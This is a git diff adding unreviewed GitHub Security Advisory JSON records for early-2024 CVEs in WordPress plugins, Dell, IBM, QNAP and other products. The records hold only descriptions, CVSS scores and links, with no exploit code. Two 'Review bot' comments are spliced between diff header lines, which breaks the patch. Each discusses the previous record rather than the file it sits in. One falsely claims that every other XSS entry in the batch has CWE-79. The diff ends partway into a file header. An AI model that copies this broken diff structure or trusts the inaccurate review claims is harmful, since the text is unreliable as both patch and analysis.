diff --git a/advisories/unreviewed/2024/02/GHSA-qv88-9x4p-qm78/GHSA-qv88-9x4p-qm78.json b/advisories/unreviewed/2024/02/GHSA-qv88-9x4p-qm78/GHSA-qv88-9x4p-qm78.json
new file mode 100644
index 0000000000000..6323fd1a4c821
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qv88-9x4p-qm78/GHSA-qv88-9x4p-qm78.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qv88-9x4p-qm78",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-24112"
+ ],
+ "details": "xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24112"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Exrick/xmall/issues/78"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qvp9-wwpx-gmjx/GHSA-qvp9-wwpx-gmjx.json b/advisories/unreviewed/2024/02/GHSA-qvp9-wwpx-gmjx/GHSA-qvp9-wwpx-gmjx.json
new file mode 100644
index 0000000000000..6591c96acbd89
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qvp9-wwpx-gmjx/GHSA-qvp9-wwpx-gmjx.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qvp9-wwpx-gmjx",
+ "modified": "2024-02-03T06:30:24Z",
+ "published": "2024-02-03T06:30:24Z",
+ "aliases": [
+ "CVE-2024-0909"
+ ],
+ "details": "The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts/pages that protections are being place on. This makes it possible for unauthenticated attackers to access protected content.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0909"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T06:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qw52-qmwq-9mjq/GHSA-qw52-qmwq-9mjq.json b/advisories/unreviewed/2024/02/GHSA-qw52-qmwq-9mjq/GHSA-qw52-qmwq-9mjq.json
new file mode 100644
index 0000000000000..e4c42a2999a1a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qw52-qmwq-9mjq/GHSA-qw52-qmwq-9mjq.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qw52-qmwq-9mjq",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0797"
+ ],
+ "details": "The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 1.0.6.1. This makes it possible for subscribers and higher to execute functions intended for admin use.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0797"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qwgv-vj4f-32vw/GHSA-qwgv-vj4f-32vw.json b/advisories/unreviewed/2024/02/GHSA-qwgv-vj4f-32vw/GHSA-qwgv-vj4f-32vw.json
new file mode 100644
index 0000000000000..9ef7c5eb3bc7d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qwgv-vj4f-32vw/GHSA-qwgv-vj4f-32vw.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qwgv-vj4f-32vw",
+ "modified": "2024-02-06T21:30:27Z",
+ "published": "2024-02-06T21:30:27Z",
+ "aliases": [
+ "CVE-2024-22515"
+ ],
+ "details": "Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22515"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T21:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qwqw-5hfm-4vgg/GHSA-qwqw-5hfm-4vgg.json b/advisories/unreviewed/2024/02/GHSA-qwqw-5hfm-4vgg/GHSA-qwqw-5hfm-4vgg.json
new file mode 100644
index 0000000000000..84a0f92886bf1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qwqw-5hfm-4vgg/GHSA-qwqw-5hfm-4vgg.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qwqw-5hfm-4vgg",
+ "modified": "2024-02-06T12:30:31Z",
+ "published": "2024-02-06T12:30:31Z",
+ "aliases": [
+ "CVE-2024-24939"
+ ],
+ "details": "In JetBrains Rider before 2023.3.3 logging of environment variables containing secret values was possible",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24939"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jetbrains.com/privacy-security/issues-fixed/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T10:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qx7r-whpj-fwx8/GHSA-qx7r-whpj-fwx8.json b/advisories/unreviewed/2024/02/GHSA-qx7r-whpj-fwx8/GHSA-qx7r-whpj-fwx8.json
new file mode 100644
index 0000000000000..a9a379d0413fe
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qx7r-whpj-fwx8/GHSA-qx7r-whpj-fwx8.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qx7r-whpj-fwx8",
+ "modified": "2024-02-01T12:30:22Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2023-52194"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Takayuki Miyauchi oEmbed Gist allows Stored XSS.This issue affects oEmbed Gist: from n/a through 4.9.1.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52194"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/oembed-gist/wordpress-oembed-gist-plugin-4-9-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-qxf6-787j-fc5g/GHSA-qxf6-787j-fc5g.json b/advisories/unreviewed/2024/02/GHSA-qxf6-787j-fc5g/GHSA-qxf6-787j-fc5g.json
new file mode 100644
index 0000000000000..fc221cd5b41e3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-qxf6-787j-fc5g/GHSA-qxf6-787j-fc5g.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qxf6-787j-fc5g",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2023-47700"
+ ],
+ "details": "IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.6 products could allow a remote attacker to spoof a trusted system that would not be correctly validated by the Storwize server. This could lead to a user connecting to a malicious host, believing that it was a trusted system and deceived into accepting spoofed data. IBM X-Force ID: 271016.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47700"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/271016"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7114767"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-295"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r263-7vjw-g5h2/GHSA-r263-7vjw-g5h2.json b/advisories/unreviewed/2024/02/GHSA-r263-7vjw-g5h2/GHSA-r263-7vjw-g5h2.json
new file mode 100644
index 0000000000000..5df8860a28908
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r263-7vjw-g5h2/GHSA-r263-7vjw-g5h2.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r263-7vjw-g5h2",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T00:31:28Z",
+ "aliases": [
+ "CVE-2024-21764"
+ ],
+ "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the product uses hard-coded credentials, which may allow an attacker to connect to a specific port.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21764"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rapidscada.org/contact/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-798"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T00:15:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json b/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json
new file mode 100644
index 0000000000000..fb8c45fcfb885
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r2c3-2vcp-2qx5",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-24003"
+ ],
+ "details": "jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutMaterialCount() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24003"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jishenghua/jshERP/issues/99"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24003.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T02:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r2g2-g732-97cw/GHSA-r2g2-g732-97cw.json b/advisories/unreviewed/2024/02/GHSA-r2g2-g732-97cw/GHSA-r2g2-g732-97cw.json
new file mode 100644
index 0000000000000..5ec3ea130978e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r2g2-g732-97cw/GHSA-r2g2-g732-97cw.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r2g2-g732-97cw",
+ "modified": "2024-02-08T09:30:41Z",
+ "published": "2024-02-08T09:30:41Z",
+ "aliases": [
+ "CVE-2024-24034"
+ ],
+ "details": "Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, allows remote attackers to execute arbitrary code.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24034"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ELIZEUOPAIN/CVE-2024-24034/tree/main"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T09:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r3mr-jgh6-phpp/GHSA-r3mr-jgh6-phpp.json b/advisories/unreviewed/2024/02/GHSA-r3mr-jgh6-phpp/GHSA-r3mr-jgh6-phpp.json
new file mode 100644
index 0000000000000..ab2c50fd7d80f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r3mr-jgh6-phpp/GHSA-r3mr-jgh6-phpp.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r3mr-jgh6-phpp",
+ "modified": "2024-02-06T09:31:37Z",
+ "published": "2024-02-06T09:31:37Z",
+ "aliases": [
+ "CVE-2023-25543"
+ ],
+ "details": "\nDell Power Manager, versions prior to 3.14, contain an Improper Authorization vulnerability in DPM service. A low privileged malicious user could potentially exploit this vulnerability in order to elevate privileges on the system. \n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25543"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000209464/dsa-2023-075"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-280"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T07:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r3vw-5726-q8gc/GHSA-r3vw-5726-q8gc.json b/advisories/unreviewed/2024/02/GHSA-r3vw-5726-q8gc/GHSA-r3vw-5726-q8gc.json
new file mode 100644
index 0000000000000..a04e977b884e5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r3vw-5726-q8gc/GHSA-r3vw-5726-q8gc.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r3vw-5726-q8gc",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-22107"
+ ],
+ "details": "An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method systemSettingsDnsDataAction at /opt/webapp/src/AppBundle/Controller/React/SystemSettingsController.php is vulnerable to command injection via the /old/react/v1/api/system/dns/data endpoint. An authenticated attacker can abuse it to inject an arbitrary command and compromise the platform.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22107"
+ },
+ {
+ "type": "WEB",
+ "url": "https://adepts.of0x.cc/gtbcc-pwned/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://x-c3ll.github.io/cves.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r4m8-492c-frc5/GHSA-r4m8-492c-frc5.json b/advisories/unreviewed/2024/02/GHSA-r4m8-492c-frc5/GHSA-r4m8-492c-frc5.json
new file mode 100644
index 0000000000000..5054fb192a510
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r4m8-492c-frc5/GHSA-r4m8-492c-frc5.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r4m8-492c-frc5",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41281"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41281"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-53"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77",
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r57p-gw8h-38xj/GHSA-r57p-gw8h-38xj.json b/advisories/unreviewed/2024/02/GHSA-r57p-gw8h-38xj/GHSA-r57p-gw8h-38xj.json
new file mode 100644
index 0000000000000..8749aa6bd21c7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r57p-gw8h-38xj/GHSA-r57p-gw8h-38xj.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r57p-gw8h-38xj",
+ "modified": "2024-02-08T06:30:24Z",
+ "published": "2024-02-08T06:30:24Z",
+ "aliases": [
+ "CVE-2024-24091"
+ ],
+ "details": "Yealink Meeting Server before v26.0.0.66 was discovered to contain an OS command injection vulnerability via the file upload interface.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24091"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.yealink.com/en/trust-center/security-advisories/2f2b990211c440cf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T06:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r5m6-pgh6-qg26/GHSA-r5m6-pgh6-qg26.json b/advisories/unreviewed/2024/02/GHSA-r5m6-pgh6-qg26/GHSA-r5m6-pgh6-qg26.json
new file mode 100644
index 0000000000000..ba694d9383815
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r5m6-pgh6-qg26/GHSA-r5m6-pgh6-qg26.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r5m6-pgh6-qg26",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0508"
+ ],
+ "details": "The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table Elementor Widget in all versions up to, and including, 2.10.27 due to insufficient input sanitization and output escaping on the user supplied link URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0508"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3021959/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r6xh-8x5q-w7v7/GHSA-r6xh-8x5q-w7v7.json b/advisories/unreviewed/2024/02/GHSA-r6xh-8x5q-w7v7/GHSA-r6xh-8x5q-w7v7.json
new file mode 100644
index 0000000000000..da171f7bb0177
--- /dev/null
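Review bot: `cwe_ids` is empty although `details` describes stored cross-site scripting caused by missing output escaping, which is CWE-79; the Patchstack-sourced XSS records in this same batch carry `"cwe_ids": [ "CWE-79" ]`, so this entry is inconsistent with them and will be skipped by any CWE-based filter. The two `browser/.../trunk/...pricing-table.php#L1010` and `#L1019` references anchor to line numbers on a moving `trunk`, so they will drift away from the vulnerable code; the `changeset/3021959/` link already present is the stable pointer, and the browser links would be more durable pinned to a revision (`?rev=`). Adding the CWE and pinning the line references are both worth doing before this record is marked reviewed.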
+++ b/advisories/unreviewed/2024/02/GHSA-r6xh-8x5q-w7v7/GHSA-r6xh-8x5q-w7v7.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r6xh-8x5q-w7v7",
+ "modified": "2024-02-01T12:30:22Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2024-22449"
+ ],
+ "details": "\nDell PowerScale OneFS versions 9.0.0.x through 9.6.0.x contains a missing authentication for critical function vulnerability. A low privileged local malicious user could potentially exploit this vulnerability to gain elevated access.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22449"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r7c8-hj86-5mfc/GHSA-r7c8-hj86-5mfc.json b/advisories/unreviewed/2024/02/GHSA-r7c8-hj86-5mfc/GHSA-r7c8-hj86-5mfc.json
new file mode 100644
index 0000000000000..1938b9c72cda5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r7c8-hj86-5mfc/GHSA-r7c8-hj86-5mfc.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r7c8-hj86-5mfc",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6701"
+ ],
+ "details": "The Advanced Custom Fields (ACF) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a custom text field in all versions up to, and including, 6.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6701"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3022469/advanced-custom-fields"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.advancedcustomfields.com/blog/acf-6-2-5-security-release/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3593dfd-7b2a-4d01-8af0-725b444dc81b?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r889-rc6f-3h5m/GHSA-r889-rc6f-3h5m.json b/advisories/unreviewed/2024/02/GHSA-r889-rc6f-3h5m/GHSA-r889-rc6f-3h5m.json
new file mode 100644
index 0000000000000..ae2034abe307e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r889-rc6f-3h5m/GHSA-r889-rc6f-3h5m.json
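Review bot: `cwe_ids` is empty for a record whose `details` is a textbook stored-XSS description (insufficient input sanitization and output escaping, contributor-level injection), so `"cwe_ids": [ "CWE-79" ]` is the classification every other XSS entry in this batch already uses and its absence here looks like an import gap rather than a deliberate choice. The fixed version is only implied by the vendor reference slug `acf-6-2-5-security-release`; `details` states the last affected version (6.2.4) but not the fix, so a consumer reading this file alone has to infer 6.2.5 from a URL, which is worth confirming against the changeset before relying on it. `affected` is empty as usual for a WordPress plugin, so none of this is matchable automatically.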
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r889-rc6f-3h5m",
